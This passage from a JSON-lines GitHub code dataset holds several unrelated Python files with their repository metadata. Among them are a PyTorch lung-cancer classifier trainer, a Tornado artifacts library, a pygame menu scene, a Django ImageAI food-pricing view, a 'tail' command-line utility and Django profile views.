input_tuple in enumerate(test_generator_eval):\r\n with torch.no_grad():\r\n # Gathering input data; prepare_input sends to gpu\r\n mrn = list(input_tuple[2])\r\n # print(mrn_str)\r\n input_tuple = input_tuple[0:2]\r\n # print(input_tuple)\r\n input_tensor, target = prepare_input(input_tuple=input_tuple, args=self.args)\r\n\r\n # Model make prediction\r\n pred = self.model(input_tensor)\r\n pred_.extend(torch.argmax(torch.sigmoid(pred), dim=1).cpu().numpy())\r\n pred2_.extend(np.array(torch.sigmoid(pred).cpu().numpy()).tolist())\r\n\r\n target_.extend(target.cpu().numpy())\r\n target2_.extend(np.array(F.one_hot(target).cpu().numpy()).tolist())\r\n\r\n x_test_clinic, y_test_clinic = \\\r\n clinical_data(args=self.args,\r\n test_mrn_list=mrn,\r\n train_mrn_list=self.args.train_mrn_list).load_test_data_batch(batch_size=1)\r\n\r\n y_pred_test_clinic = clinical_model_.predict_proba(x_test_clinic)\r\n target2_c.extend(y_test_clinic)\r\n pred2_c.extend(np.array(y_pred_test_clinic).tolist())\r\n\r\n target2_ = np.array(target2_)\r\n pred2_ = np.array(pred2_)\r\n\r\n pred2_c_1 = [x[1] for x in pred2_c]\r\n\r\n ### Evaluating loaded data above (Validation, Train, Test)\r\n # printing precision, recall, and fscore for each class for validation data\r\n print('\\nTest INFORMATION - IMAGE/CLINIC BASED MODEL\\n')\r\n\r\n pred2_[:, 0] = np.add(np.dot(1 - pred2_[:, 1], alpha_image),\r\n np.dot([1 - x for x in pred2_c_1], (1 - alpha_image)))\r\n\r\n pred2_[:, 1] = np.add(np.dot(pred2_[:, 1], alpha_image),\r\n np.dot(pred2_c_1, (1 - alpha_image)))\r\n\r\n assert [np.argmax(np.array(x).tolist()) for x in target2_] == [np.argmax(x) for x in np.array(target2_c)]\r\n\r\n print('COMBINED IMAGE AND CLINIC MODEL - Test DATA')\r\n\r\n target_names = ['class ' + str(x) for x in range(self.args.n_classes)]\r\n print('\\n', classification_report([np.argmax(np.array(x).tolist()) for x in target2_],\r\n np.argmax(pred2_, axis=-1),\r\n target_names=target_names))\r\n\r\n\r\n # PRED2_ HAS BEEN UPDATED IN THE CODE ABOVE AND REPRESENTS PREDICTION SCORE OF IMAGE AND CLINIC COMBINED\r\n fig_add = roc_auc_plot(\r\n np.array([to_categorical(np.argmax(np.array(x)), self.args.n_classes).tolist() for x in target2_]),\r\n # target2_c,\r\n pred2_,\r\n data_title='Test Image/Clinic ROC')\r\n self.tb_logger.add_figure(f\"Test_ROC_Image_Clinic\", figure=fig_add)\r\n\r\n auc_ = roc_auc_score(\r\n y_true=np.array([np.argmax(np.array(x)).tolist() for x in target2_]),\r\n y_score=pred2_[:, 1])\r\n print('combine image and clinic test auc: ', auc_)\r\n\r\n self.tb_logger.close()\r\n\r\n def train_epoch_alex(self, epoch):\r\n\r\n # Creates once at the beginning of training\r\n\r\n def time_report(initial_time, time_name):\r\n get_time_diff = time.gmtime(time.time() - initial_time)\r\n readable_time = time.strftime(\"%M:%S\", get_time_diff)\r\n print(f\"{time_name} time: {readable_time} (min:seconds)\")\r\n del get_time_diff\r\n del readable_time\r\n\r\n epoch_start_time = time.time()\r\n self.model.train()\r\n\r\n # Storing epoch values obtained from batch calculations\r\n loss_cum = []\r\n auc_cum = []\r\n prauc_cum = []\r\n spec_cum = []\r\n sens_cum = []\r\n\r\n log.info('-------------------------------------------------------------------------------------------')\r\n\r\n for batch_idx, input_tuple in enumerate(self.train_data_loader):\r\n # Gathering input data; prepare_input sends to gpu\r\n input_tensor, target = prepare_input(input_tuple=input_tuple, args=self.args)\r\n\r\n # may need to turn on if want to train fully but off for transfer learning\r\n # input_tensor.requires_grad = True\r\n\r\n # Model make prediction\r\n pred = self.model(input_tensor)\r\n\r\n # calculating loss and metrics\r\n loss = self.criterion_pre(pred, target.long().view(-1))\r\n\r\n # need to calculate gradient\r\n self.model.zero_grad()\r\n\r\n loss.backward()\r\n\r\n def clip_gradient(optimizer, grad_clip):\r\n for group in optimizer.param_groups:\r\n for param in group[\"params\"]:\r\n if param.grad is not None:\r\n param.grad.data.clamp_(-grad_clip, grad_clip)\r\n\r\n clip_gradient(self.optimizer, 5)\r\n self.optimizer.step()\r\n\r\n # Calculating and appending\r\n with torch.no_grad():\r\n auc = calculate_auc(pred, target)\r\n prauc = calculate_prauc(pred, target)\r\n spec, sens = dr_friendly_measures(pred, target)\r\n\r\n # storing loss and metrics\r\n loss_cum.append(loss.item())\r\n auc_cum.append(auc)\r\n prauc_cum.append(prauc)\r\n spec_cum.append(spec)\r\n sens_cum.append(sens)\r\n\r\n if (batch_idx + 1) % self.print_batch_spacing == 0:\r\n log.info(f\"\\tBatch {batch_idx + 1} of {len(self.train_data_loader)}\")\r\n log.info(\r\n f\"\\tLoss: {loss.item()}, PRAUC: {prauc}, AUC: {auc}, Sensitivity: {sens}, Specificity: {spec}\")\r\n log.info('\\t**************************************************************************')\r\n else:\r\n pass\r\n\r\n # self.tb_logger.add_pr_curve('training_PR_curve', target_, pred_, global_step=0)\r\n\r\n # test_str = f\"training_loss-{self.args.short_note}\"\r\n self.tb_logger.add_scalar(f\"training_loss\", loss.item(), self.train_count)\r\n self.tb_logger.add_scalar(f\"training_auc\", auc, self.train_count)\r\n self.tb_logger.add_scalar(f\"training_prauc\", prauc, self.train_count)\r\n self.tb_logger.add_scalar(f\"training_sensitivity\", sens, self.train_count)\r\n self.tb_logger.add_scalar(f\"training_specificity\", spec, self.train_count)\r\n\r\n self.tb_logger.flush()\r\n\r\n # train count for tensorboard logging\r\n self.train_count += 1\r\n\r\n if not self.args.ci_test:\r\n # save model\r\n if batch_idx == 0 and (epoch * len(self.train_data_loader)) != 0 and (\r\n epoch * len(self.train_data_loader)) % self.save_interval == 0:\r\n # if batch_id_sp != 0 and batch_id_sp % save_interval == 0:\r\n model_save_path = '{}_epoch_{}_batch_{}.pth.tar'.format(self.args.save_folder, epoch, batch_idx)\r\n model_save_dir = os.path.dirname(model_save_path)\r\n if not os.path.exists(model_save_dir):\r\n os.makedirs(model_save_dir)\r\n\r\n log.info('Save checkpoints: epoch = {}, batch_id = {}'.format(epoch, batch_idx))\r\n torch.save({\r\n 'epoch': epoch,\r\n 'batch_id': batch_idx,\r\n 'state_dict': self.model.state_dict(),\r\n 'optimizer': self.optimizer.state_dict()},\r\n model_save_path)\r\n\r\n # Calculating time per epoch\r\n ty_res = time.gmtime(time.time() - epoch_start_time)\r\n res = time.strftime(\"%M:%S\", ty_res)\r\n log.info(\r\n f\"Summary-----Loss: {np.round(sum(loss_cum) / len(loss_cum), 4)}, PRAUC: {np.round(np.nanmedian(prauc_cum), 4)}, \"\r\n f\"AUC: {np.round(np.nanmedian(auc_cum), 4)},\\n\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\tSensitivity: {np.round(np.nanmedian(sens_cum), 4)}, \"\r\n f\"Specificity: {np.round(np.nanmedian(spec_cum), 4)}\\n\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\"\r\n f\"Epoch: {res} (min:seconds), # nan: {sum(math.isnan(x) for x in auc_cum)}\")\r\n log.info('-------------------------------------------------------------------------------------------')\r\n\r\n def validate_epoch_alex(self, epoch):\r\n self.model.eval()\r\n\r\n # Storing epoch values obtained from batch calculations\r\n loss_cum = []\r\n auc_cum = []\r\n prauc_cum = []\r\n spec_cum = []\r\n sens_cum = []\r\n\r\n # starting epoch timer\r\n epoch_start_time = time.time()\r\n\r\n log.info('-------------------------------------------------------------------------------------------')\r\n for batch_idx, input_tuple in enumerate(self.valid_data_loader):\r\n\r\n if (batch_idx + 1) % self.print_batch_spacing == 0:\r\n log.info('*************************************')\r\n log.info(f\"\\tBatch {batch_idx + 1} of {len(self.valid_data_loader)}\")\r\n else:\r\n pass\r\n\r\n with torch.no_grad():\r\n input_tensor, target = prepare_input(input_tuple=input_tuple, args=self.args)\r\n # input_tensor.requires_grad = False\r\n\r\n pred = self.model(input_tensor)\r\n\r\n loss = self.criterion_pre(pred, target.long().view(-1))\r\n auc = calculate_auc(pred, target)\r\n prauc = calculate_prauc(pred, target)\r\n spec, sens = dr_friendly_measures(pred, target)\r\n\r\n # storing loss and metrics\r\n loss_cum.append(loss.item())\r\n auc_cum.append(auc)\r\n prauc_cum.append(prauc)\r\n spec_cum.append(spec)\r\n sens_cum.append(sens)\r\n\r\n if (batch_idx + 1) % self.print_batch_spacing == 0:\r\n # log.info('\\t**************************************************************************')\r\n log.info(f\"\\tBatch {batch_idx + 1} of {len(self.train_data_loader)}\")\r\n log.info(\r\n f\"\\tLoss: {loss.item()}, PRAUC: {prauc}, AUC: {auc}, Sensitivity: {sens}, Specificity: {spec}\")\r\n log.info('\\t**************************************************************************')\r\n else:\r\n pass\r\n\r\n self.tb_logger.add_scalar(f\"val_loss\", loss.item(), self.val_count)\r\n self.tb_logger.add_scalar(f\"val_auc\", auc, self.val_count)\r\n self.tb_logger.add_scalar(f\"val_prauc\", prauc, self.val_count)\r\n self.tb_logger.add_scalar(f\"val_sensitivity\", sens, self.val_count)\r\n self.tb_logger.add_scalar(f\"val_specificity\", spec, self.val_count)\r\n\r\n self.tb_logger.flush()\r\n\r\n self.val_count += 1\r\n\r\n self.val_loss = sum(loss_cum) / len(loss_cum)\r\n\r\n ty_res = time.gmtime(time.time() - epoch_start_time)\r\n res = time.strftime(\"%M:%S\", ty_res)\r\n log.info(\r\n f\"Summary-----Loss: {np.round(sum(loss_cum) / len(loss_cum), 4)}, PRAUC: {np.round(np.nanmedian(prauc_cum), 4)}, \"\r\n f\"AUC: {np.round(np.nanmedian(auc_cum), 4)},\\n\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\tSensitivity: {np.round(np.nanmedian(sens_cum), 4)}, \"\r\n f\"Specificity: {np.round(np.nanmedian(spec_cum), 4)}\\n\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\"\r\n f\"Epoch: {res} (min:seconds), # nan: {sum(math.isnan(x) for x in auc_cum)}\")\r\n log.info('-------------------------------------------------------------------------------------------')\r\n","repo_name":"MikeDoho/Lung_Cancer_Classification","sub_path":"lib/Trainers/pytorch_trainer_pretrain_clinic.py","file_name":"pytorch_trainer_pretrain_clinic.py","file_ext":"py","file_size_in_byte":33209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"16167533672","text":"# read the contents of README file\nfrom os import path\n\nfrom setuptools import setup\n\nthis_directory = path.abspath(path.dirname(__file__))\nwith open(path.join(this_directory, 'README.md'), encoding='utf-8') as f:\n long_description = f.read()\n\nsetup(name='discordlogger',\n version='0.0.2',\n description=('A Python logger to send information to Discord Webhooks.'),\n long_description=long_description,\n long_description_content_type='text/markdown',\n url='https://github.com/2press/discord-logger',\n author='pressure',\n author_email='pres.sure@ymail.com',\n license='MIT',\n packages=['discordlogger'],\n install_requires=[\n 'requests'\n ],\n zip_safe=False)\n","repo_name":"2press/discord-logger","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":725,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"6"} +{"seq_id":"10665499057","text":"import pygame\nfrom pygame import Surface, Rect, draw\nfrom pygame.font import Font, get_default_font\n\nfrom protocols.game import Game\nfrom scene.scene import Scene\n\n\nclass ConfigScene(Scene):\n \n def __init__(self, game: Game):\n super().__init__(\"Config\", game)\n self.options = {\n 'Start': {'selected': True},\n 'Configuration': {'selected': False},\n 'Quit Game': {'selected': False}\n }\n self.background = Surface(game.screen.get_size())\n self.background.fill((0, 120, 0))\n self.font_size = 80\n self.font = Font(get_default_font(), self.font_size)\n \n\n def update(self) -> None:\n super().update()\n self.game.screen.blit(self.background, (0, 0))\n x, y = (self.game.config.WIDTH / 2, self.game.config.HEIGHT / 2)\n for option in self.options:\n render = self.font.render(option, 'True', (255, 255, 255))\n position = render.get_rect(center=(x, y))\n rect = self.game.screen.blit(render, position)\n self.options[option]['rect'] = rect\n y += self.font_size + 5\n for option in self.options.values():\n if option['selected']:\n rect = Rect(\n option['rect'].x - 10,\n option['rect'].y - 10,\n option['rect'].width + 20,\n option['rect'].height + 20\n )\n draw.rect(\n surface=self.game.screen,\n color=(255, 0, 255),\n rect=rect,\n width=5,\n border_radius=10)\n\n# def change_selection(scene: Scene, event: pygame.event) -> None:\n# if event.type == MOUSEBUTTONDOWN and event.button == 1:\n# for option in options.values():\n# if option.rect.collidepoint(pygame.mouse.get_pos()):\n# for _option in options.values():\n# _option.selected = False\n# option.selected = True\n# index = list(options.values()).index(option)\n# print(index, option.name)\n# if event.type == KEYDOWN:\n# if event.key == K_DOWN:\n# for option in options.values():\n# if option.selected:\n# index = list(options.values()).index(option)\n# if (index := index + 1) < len(options):\n# options[list(options)[index]].selected = True\n# option.selected = False\n# if event.key == K_RETURN:\n# for option in options.values():\n# if option.selected:\n# if option.name == 'Start':\n# scene.game.scene = startScene(scene.game)\n# if option.name == 'Quit Game':\n# scene.game.quit()\n# scene.add_action(change_selection)\n# scene.add_system(update)\n","repo_name":"RCristiano/game_project","sub_path":"app/scenes/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2893,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"8927011304","text":"from __future__ import absolute_import\nfrom __future__ import print_function\n\nimport logging\n\nfrom tornado import concurrent\nfrom tornado import gen\n\nfrom flowz import channels\n\n\nclass AbstractArtifact(object):\n \"\"\"\n An object that wraps the details for asynchronous access to an artifact.\n \"\"\"\n\n logger = logging.getLogger(__name__)\n name = None\n\n __exists__ = False\n __ensure__ = None\n __get__ = None\n\n def __init__(self, logger=None, name=None):\n if logger:\n self.logger = logger\n if not name:\n self._as_string = type(self).__name__\n else:\n self._as_string = '%s<%s>' % (type(self).__name__, name)\n self.name = name\n\n def __str__(self):\n return self._as_string\n\n def exists(self):\n \"\"\"\n Returns True if the artifact already exists; False otherwise.\n \"\"\"\n return self.__exists__\n\n def ensure(self):\n \"\"\"\n Returns a Future that will have result True when the artifact's existence is assured.\n \"\"\"\n if self.__ensure__ is None:\n self.logger.debug(\"%s starting ensure\" % str(self))\n self.__ensure__ = self.__start_ensure__()\n return self.__ensure__\n\n @gen.coroutine\n def __start_ensure__(self):\n \"\"\"\n Invoked once to start the asynchronous 'ensure' action.\n \"\"\"\n yield self.get()\n raise gen.Return(True)\n\n def get(self):\n \"\"\"\n Returns a Future the result of which will be the artifact itself.\n \"\"\"\n if self.__get__ is None:\n self.logger.debug(\"%s starting get\" % str(self))\n self.__get__ = self.__start_get__()\n return self.__get__\n\n @gen.coroutine\n def __start_get__(self):\n self.__exists__ = True\n raise gen.Return(self)\n\n def as_channel(self):\n \"\"\"\n Returns a channel with `self` as its sole item.\n \"\"\"\n return channels.IterChannel(a for a in (self,))\n\n def value_channel(self):\n \"\"\"\n Returns a channel with self's artifact when it's ready.\n \"\"\"\n return self.as_channel().map(lambda a: a.get()).each_ready()\n\n def ensure_channel(self):\n \"\"\"\n Returns a channel with self's ensure() when it's ready.\n \"\"\"\n return self.as_channel().map(lambda a: a.ensure()).each_ready()\n\n\nclass ExtantArtifact(AbstractArtifact):\n \"\"\"\n An Artifact that is known to exist and asynchronously retrievable.\n \"\"\"\n\n __exists__ = True\n\n def __init__(self, getter, logger=None, name=None):\n \"\"\"\n Create an artifact that is known to exist and asynchronously retrievable.\n\n @param getter: An asynchronous coroutine to get the value\n \"\"\"\n super(ExtantArtifact, self).__init__(logger=logger, name=name)\n self.getter = getter\n\n @gen.coroutine\n def __start_ensure__(self):\n # It is known to exist, so there's nothing to ensure.\n raise gen.Return(True)\n\n @gen.coroutine\n def __start_get__(self):\n try:\n result = yield self.getter()\n except:\n self.logger.exception(\"%s getter failure.\" % str(self))\n raise\n self.logger.debug(\"%s retrieved.\" % str(self))\n raise gen.Return(result)\n\n\nclass DerivedArtifact(AbstractArtifact):\n \"\"\"\n An Artifact that needs to be derived from some sources.\n \"\"\"\n\n def __init__(self, deriver, *sources, **kw):\n \"\"\"\n Create an artifact that needs to be derived from some sources.\n\n @param deriver: a synchronous function to derive the value\n @param sources: zero or more sources that can be synchronous or asychronous\n \"\"\"\n super(DerivedArtifact, self).__init__(\n kw.get('logger'), kw.get('name'))\n self.sources = sources\n self.deriver = deriver\n\n @gen.coroutine\n def __start_get__(self):\n self.logger.debug(\"%s waiting on sources.\" % str(self))\n sources = yield [maybe_artifact(source) for source in self.sources]\n self.logger.debug(\"%s running deriver.\" % str(self))\n yield gen.moment\n try:\n result = self.deriver(*sources)\n except:\n self.logger.exception(\"%s deriver failure.\" % str(self))\n raise\n self.__exists__ = True\n self.logger.debug(\"%s ready.\" % str(self))\n self.sources = None\n self.deriver = None\n raise gen.Return(result)\n\n\nclass ThreadedDerivedArtifact(DerivedArtifact):\n \"\"\"\n A DerivedArtifact that does its derivation on a thread pool executor\n \"\"\"\n\n def __init__(self, executor, deriver, *sources, **kw):\n \"\"\"\n Create an artifact that does its derivation on a thread pool executor\n @param executor: the thread pool executor on which to run\n @param deriver: a synchronous function to derive the value\n @param sources: zero or more sources that can be synchronous or asychronous\n \"\"\"\n super(ThreadedDerivedArtifact, self).__init__(deriver, *sources, **kw)\n self.logger.debug(\"%s created (%s).\" % (str(self), self.name))\n self.executor = executor\n\n @concurrent.run_on_executor\n def __derive__(self, *sources):\n self.logger.debug(\"%s running deriver on executor.\" % str(self))\n try:\n return self.deriver(*sources)\n except:\n self.logger.exception(\"%s deriver failure.\" % str(self))\n raise\n\n @gen.coroutine\n def __start_get__(self):\n self.logger.debug(\"%s waiting on sources.\" % str(self))\n sources = yield [maybe_artifact(source) for source in self.sources]\n result = yield self.__derive__(*sources)\n self.__exists__ = True\n self.logger.debug(\"%s ready.\" % str(self))\n self.sources = None\n self.deriver = None\n raise gen.Return(result)\n\n\nclass WrappedArtifact(AbstractArtifact):\n \"\"\"\n An artifact that wraps another artifact (the \"value\"), passing through most\n calls to it.\n\n This class is effectively abstract, since it provides little value when directly used.\n \"\"\"\n\n def __init__(self, value, logger=None, name=None):\n \"\"\"\n Create an artifact that wraps another artifact (the \"value\"), passing through most\n calls to it.\n\n @param value: another artifact\n \"\"\"\n super(WrappedArtifact, self).__init__(logger=logger, name=name)\n self.value = value\n\n def exists(self):\n return self.value.exists()\n\n def ensure(self):\n return self.value.ensure()\n\n def __getattr__(self, attr):\n # NOTE: The text below used to be...\n # if hasattr(self, 'value'):\n # ...but that breaks under Python 3, which seems to immediately call __getattr__ again.\n if 'value' in self.__dict__:\n return getattr(self.value, attr)\n else:\n raise AttributeError(\"No such attribute: %r; value not yet initialized\" % attr)\n\n def __getitem__(self, item):\n try:\n return self.value[item]\n except KeyError:\n # Want the KeyError to originate here.\n raise KeyError(\"No such key: %s\" % repr(item))\n\n @gen.coroutine\n def __start_get__(self):\n value = yield maybe_artifact(self.value)\n raise gen.Return(value)\n\n\nclass TransformedArtifact(WrappedArtifact):\n \"\"\"\n A WrappedArtifact that transforms the value of the wrapped artifact\n \"\"\"\n\n def __init__(self, value, transformer=lambda x: x, logger=None, name=None):\n \"\"\"\n Create an artifact that transforms the value of its wrapped artifact.\n\n @param value: another artifact\n @param transformer: a synchronous function\n \"\"\"\n super(TransformedArtifact, self).__init__(value, logger=logger, name=name)\n self.transformer = transformer\n\n @gen.coroutine\n def __start_get__(self):\n value = yield maybe_artifact(self.value)\n yield gen.moment\n try:\n value = self.transformer(value)\n except:\n self.logger.exception(\"%s transformer failure.\" % str(self))\n raise\n raise gen.Return(value)\n\n\ndef maybe_artifact(value):\n # Still duck typing for \"artifacts\", for now\n if hasattr(value, 'get') and hasattr(value, 'exists') and hasattr(value, 'ensure'):\n return value.get()\n return gen.maybe_future(value)\n\n\nclass KeyedArtifact(WrappedArtifact):\n \"\"\"\n A WrappedArtifact that knows the key of its original artifact,\n even before the original artifact has been resolved.\n\n * `key`: the logical key (often a single point from a quantized\n logical or observational time dimension) for identifying this\n item in a sequence, for cogrouping operations, etc. Its meaning\n and structure is domain-specific. The key must not change\n during the lifetime of the artifact.\n\n * `original`: the wrapped artifact.\n\n All attributes can be accessed both as normal attributes and as\n dictionary keys. Thus `item.key is item[\"key\"]` and so on.\n\n Additionally, `item[0]` will give you the key and `item[1]` will give\n the item itself, and `iter(item)` will give you the sequence\n `(item.key, item)`.\n\n This allows `KeyedArtifact` instances to be used as if they were key,value\n pairs, directly, for things like cogrouping.\n \"\"\"\n\n def __init__(self, key, value, logger=None, name=None):\n super(KeyedArtifact, self).__init__(value, logger=logger, name=name)\n self.key = key\n\n def __getitem__(self, idx):\n if idx == 0:\n return self.key\n elif idx == 1:\n return self\n try:\n return getattr(self, idx)\n except AttributeError:\n raise KeyError(\"No such key: %s\" % repr(idx))\n\n def __iter__(self):\n return iter((self.key, self))\n\n def transform(self, func, *params, **kw):\n \"\"\"\n Create a KeyedArtifact that transforms the value of this artifact, but preserves\n the same key.\n\n @param func: a synchronous function\n @param params: the initial parameter to func, to which this artifacts value will be appended\n \"\"\"\n params += (self.value,)\n return KeyedArtifact(self.key, DerivedArtifact(func, *params, **kw))\n\n def threaded_transform(self, executor, func, *params, **kw):\n \"\"\"\n Create a KeyedArtifact that transforms the value of this artifact, but preserves\n the same key. The transformation will run on a separate thread.\n\n @param executor: the thread pool executor\n @param func: a synchronous function\n @param params: the initial parameter to func, to which this artifacts value will be appended\n \"\"\"\n params += (self.value,)\n return KeyedArtifact(self.key, ThreadedDerivedArtifact(executor, func, *params, **kw))\n","repo_name":"ethanrowe/flowz","sub_path":"flowz/artifacts.py","file_name":"artifacts.py","file_ext":"py","file_size_in_byte":10883,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"6"} +{"seq_id":"70184691068","text":"# Import module \nfrom tkinter import *\n\nfrom PIL import ImageTk, Image\n\nroot = Tk()\n# Adjust size \nroot.geometry(\"800x600\") \n\n# Add image file \ncanv = Canvas(root, width=800, height=600, bg='white')\ncanv.grid(row=2, column=3)\n\nimage1 = Image.open(\"bg.png\")\nimage1 = image1.resize((600, 450), Image.ANTIALIAS)\n\ntest = ImageTk.PhotoImage(image1)\ncanv.create_image(0, 0, anchor=NW, image=test)\n\n\nlabel1 = Label( root,text='lower left') \nlabel1.place(x = 100, y = 0) \n\n# Execute tkinter \nroot.mainloop() \n","repo_name":"danmirror/gui-python-simple","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"22728688394","text":"import os , sys , re , base64 , json\nfrom django.shortcuts import render_to_response , render\nfrom django.views.generic import TemplateView\nfrom imageai.Detection import ObjectDetection\n# from django.utils import simplejson\nfrom datetime import datetime\n\nexecution_path = os.getcwd()\n\ndef base64ToFilePath(base64Str , basePath = \"./home/libs/input/\"):\n img_data = bytes(base64Str, 'utf-8')\n fileName = datetime.today().strftime('%Y-%m-%d-%H:%M:%S') + \".png\"\n filePath = basePath + fileName\n with open(os.path.join(execution_path ,filePath ), \"wb\") as fh:\n fh.write(base64.decodebytes(img_data))\n return fileName\n\ndef filePathToBase64(filePath):\n base64Str = ''\n with open(os.path.join(execution_path ,filePath ), \"rb\") as image_file:\n base64Str = base64.b64encode(image_file.read())\n return 'data:image/png;base64,' + base64Str.decode(\"utf-8\") \n\nprices = {\n 'bottle' : 10,\n 'apple' : 15,\n 'orange' : 15,\n 'sandwich' : 20,\n 'hot dog' : 25,\n 'pizza' : 200,\n 'donut' : 40,\n 'cake' : 120\n}\n\ndef processImage(input_file,output_file) :\n os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\n execution_path = os.getcwd()\n\n detector = ObjectDetection()\n detector.setModelTypeAsYOLOv3()\n detector.setModelPath( os.path.join(execution_path , \"./home/libs/yolo.h5\"))\n detector.loadModel()\n\n custom_objects = detector.CustomObjects(bottle=True, apple=True, orange=True, sandwich=True, hot_dog=True, pizza=True, donut=True, cake=True)\n detections = detector.detectCustomObjectsFromImage(custom_objects=custom_objects, input_image=os.path.join(execution_path , input_file), output_image_path=os.path.join(execution_path , output_file), minimum_percentage_probability=30)\n\n totalPrice = 0\n items = []\n for eachObject in detections:\n name = eachObject[\"name\"]\n totalPrice = totalPrice + prices[name]\n items.append([ name , prices[name] ])\n # print(eachObject[\"name\"] , \" : \", eachObject[\"percentage_probability\"], \" : \", eachObject[\"box_points\"] , \" : \" , prices[eachObject[\"name\"]] , \" Baht\" )\n return ( totalPrice , items )\n\n# result = processImage(sys.argv[1],sys.argv[2]) \n# print(\"result totalPrice\",result[0])\n\nclass HomePageView(TemplateView):\n def get(self, request, **kwargs):\n return render(request, 'index.html', context=None)\n def post(self, request, **kwargs):\n image = request.POST['image']\n image = re.sub('^data:image\\/[a-z]+;base64,','', image)\n inputPath = \"./home/libs/input/\"\n outputPath = \"./home/libs/output/\"\n fileName = base64ToFilePath(image)\n result = processImage(inputPath + fileName , outputPath + fileName )\n base64Str = filePathToBase64(outputPath + fileName)\n print(json.dumps(result[1], separators=(',', ':')))\n # return render(request, 'index.html', { 'image' : base64Str , 'items' : result[1]}) \n return render(request, 'index.html', { 'image' : base64Str , 'items' : json.dumps(result[1])}) \n","repo_name":"sawatdee/AI-image-processing","sub_path":"home/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3028,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"988686806","text":"#!/usr/bin/env python3\nfrom os import path\nfrom itertools import chain\nfrom contextlib import suppress \nfrom argparse import ArgumentParser \nfrom tail import read_last_lines, follow_lines\n\n\ndef init_argparse() -> ArgumentParser:\n parser = ArgumentParser(\n usage=\"tail [-f] [-n number] [FILE]\",\n description=\"The tail utility displays the contents of file to the standard output.\"\n )\n parser.add_argument(\"-f\", \"--follow\", action=\"store_true\", default=False)\n parser.add_argument(\"-n\", \"--number\", type=int, default=10)\n parser.add_argument(\"FILE\", nargs=1, type=readable_file(parser))\n return parser\n\n\ndef readable_file(parser: ArgumentParser):\n def inner(filename: str) -> str:\n if not path.exists(filename):\n parser.error(f\"File is not readable: {filename}\")\n return filename\n return inner\n\n\ndef tail(filename: str, lines: int, follow: bool):\n with open(filename, \"r\") as fh:\n lines = read_last_lines(fh, lines)\n if follow:\n lines = chain(lines, follow_lines(fh))\n \n with suppress(KeyboardInterrupt):\n for line in lines:\n print(line, end=\"\")\n\n\ndef main():\n parser = init_argparse()\n args = parser.parse_args()\n tail(\n filename=next(iter(args.FILE)), \n lines=args.number, \n follow=args.follow\n )\n \n\nif __name__ == '__main__':\n main()\n","repo_name":"0eu/tail-assignment","sub_path":"tail.py","file_name":"tail.py","file_ext":"py","file_size_in_byte":1405,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"72510040189","text":"from django.shortcuts import render, redirect\nfrom django.contrib import messages \nfrom django.contrib.auth.decorators import login_required\nfrom .forms import UserRegisterForm, UserUpdateForm, ProfileUpdateForm, ExampleForm\nfrom django.contrib.auth import user_logged_in\nfrom main.models import Post, PostImage\nfrom .models import Profile\nfrom django.views.decorators.csrf import csrf_exempt\nfrom .api.serializers import ProfileSerializer\nfrom django.http import JsonResponse\n\n\n# Create your views here.\ndef logged_in_message(sender, user, request, **kwargs):\n \"\"\"\n Add a welcome message when the user logs in\n \"\"\"\n messages.info(request, f'Welcome {user.username}!')\n\nuser_logged_in.connect(logged_in_message)\ndef register(request):\n if request.method == 'POST':\n form = UserRegisterForm(request.POST) # get data from register form and clean it\n if form.is_valid():\n form.save()#\n messages.success(request, f'Your account has been created! Now you can log in')\n return redirect('login')\n else :\n form = UserRegisterForm()\n return render(request, 'users/register.html', {'form': form, 'title': 'Register'})\n\n@login_required\ndef profile(request):\n author_id = request.user.id\n posts = Post.objects.filter(author=author_id)\n context = {\n 'posts': posts,\n 'title': 'Profile page',\n }\n return render(request, 'users/profile.html', context)\n\n@login_required\ndef profile_update(request):\n e_form = ExampleForm()\n if request.method == 'POST':\n u_form = UserUpdateForm(request.POST, instance=request.user)\n p_form = ProfileUpdateForm(request.POST, request.FILES, instance=request.user.profile)\n if 'cancel' in request.POST:\n return redirect('profile')\n if u_form.is_valid() and p_form.is_valid():\n u_form.save()#\n p_form.save()#\n messages.success(request, f'Your account has been updated!')\n return redirect('profile')\n else :\n u_form = UserUpdateForm(instance=request.user)\n p_form = ProfileUpdateForm(instance=request.user.profile)\n\n context = {\n 'u_form': u_form,\n 'p_form': p_form,\n 'e_form': e_form,\n 'title': 'Profile page',\n }\n return render(request, 'users/profile-update.html', context)\n\n@login_required\ndef my_posts(request):\n author_id = request.user.id\n posts = Post.objects.filter(author=author_id)\n context = {\n 'posts': posts,\n 'title': 'Profile page',\n }\n return render(request, 'users/my-posts.html', context)\n\n@csrf_exempt\ndef get_user_profile_image(request, id):\n profile = Profile.objects.get(user=id)\n serializer = ProfileSerializer(profile).data\n return JsonResponse(serializer, safe=False)\n\ndef delete_profile_image(request, id):\n print(\"Delete profile image\")\n print(request)\n return","repo_name":"userksv/carsbay","sub_path":"users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2894,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"71364618748","text":"from scrapy_balloons.selenium_api import SeleniumApi as slm\nfrom scrapy_balloons.selenium_api import *\nfrom selenium.webdriver.common.by import By\nfrom 